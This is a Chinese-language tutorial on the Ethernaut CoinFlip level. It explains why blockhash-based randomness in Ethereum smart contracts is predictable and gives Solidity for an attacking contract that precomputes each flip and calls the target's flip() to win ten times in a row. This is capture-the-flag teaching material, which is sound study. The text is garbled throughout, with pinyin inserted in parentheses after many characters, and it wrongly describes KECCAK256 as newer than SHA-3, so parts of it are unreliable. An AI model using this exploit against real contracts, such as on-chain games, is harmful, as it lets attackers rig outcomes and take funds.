以太坊如何產(chǎn)生隨機(jī)性以太坊區(qū)塊鏈上沒有真正的隨機(jī)性，只有被認(rèn)為足夠好的隨機(jī)生成器。開發(fā)人員目前通過在以太坊中的散列獨(dú)特性或難以篡改

以太坊如何產(chǎn)生“隨機(jī)性”

以太坊區(qū)塊鏈上沒有真正的隨機(jī)性，只有被認(rèn)為“足夠好”的隨機(jī)生成器。

開發(fā)人員目前通過在以太坊中的散列獨(dú)特性或難以篡改性的變量創(chuàng)建偽隨機(jī)性。此類變量的示例包括transaction timestamp, sender address, block height 。

以太坊提供兩種主要的加密散列函數(shù)，即SHA-3和較新的KECCAK256，它們對(duì)這些輸入變量的串聯(lián)字符串進(jìn)行散列。

最終生成的哈希被轉(zhuǎn)換為一個(gè)大整數(shù)，然后由n修改。 這是為了得到一組離散的概率整數(shù)，在0到n的期望范圍內(nèi)。

請(qǐng)注意，在我們的Ethernaut練習(xí)中，n = 2代表硬幣翻轉(zhuǎn)的兩面。

這種在智能合約中導(dǎo)出偽隨機(jī)性的方法很容容易受到攻擊。如果知道輸入的黑客可以結(jié)此猜出“隨機(jī)”結(jié)果。

這就是解決CoinFlip級(jí)別的關(guān)鍵。 在這里，確定硬幣翻轉(zhuǎn)的輸入變量對(duì)于您來說是公開的。

詳情演練

我們來創(chuàng)建一個(gè)惡意智能合約，檢查硬幣翻轉(zhuǎn)的結(jié)果。

只有當(dāng)你正確猜到了結(jié)果時(shí)，你才能調(diào)用真實(shí)合約的翻轉(zhuǎn)(bool _guess)函數(shù)。

1、在Remix IDE中，創(chuàng)建一個(gè)與CoinFlip.sol相關(guān)的惡意合同：

contract hackCoinFlip {

CoinFlip public originalContract = CoinFlip(

"your instance address");

uint256 FACTOR = 578960446186580977117854925043439539266349923

32820282019728792003956564819968;

function hackFlip(bool _guess) public {

//TODO

}

}

2、實(shí)現(xiàn)hackFlip()函數(shù)，使用與原始智能合約相同的邏輯和輸入變量來預(yù)測(cè)翻轉(zhuǎn)結(jié)果。 既然你知道blockhash和block.number，那么你就能準(zhǔn)確預(yù)測(cè)正確的_guess。

function hackFlip(bool _guess) public {

// pre-deteremine the flip outcome

uint256 blockValue = uint256(block.blockhash(block.number-1));

uint256 coinFlip = blockValue / FACTOR;

bool side = coinFlip == 1 ? true : false;

// If I guessed correctly, submit my guess

if (side == _guess) {

originalContract.flip(_guess);

} else {

// If I guess incorrectly, submit the opposite

originalContract.flip(!_guess);

}

}

3、調(diào)用你的hackFlip()函數(shù)10次。當(dāng)您做出正確的猜測(cè)時(shí)，原始智能合約的consecutiveWins計(jì)數(shù)器應(yīng)該逐步增加。

關(guān)鍵安全要點(diǎn)

1. 沒有真的隨機(jī)性。

2. 在計(jì)算智能合約中的“隨機(jī)性”時(shí)(或者甚至從現(xiàn)有的隨機(jī)數(shù)庫繼承)時(shí)要格外注意。 如果您使用隨機(jī)性來確定比賽獲勝者，請(qǐng)記住，對(duì)手可以輕松猜出隨機(jī)結(jié)果并破解您的游戲!（鏈三豐）

關(guān)鍵詞： 以太坊 偽隨機(jī) 加密散列函數(shù)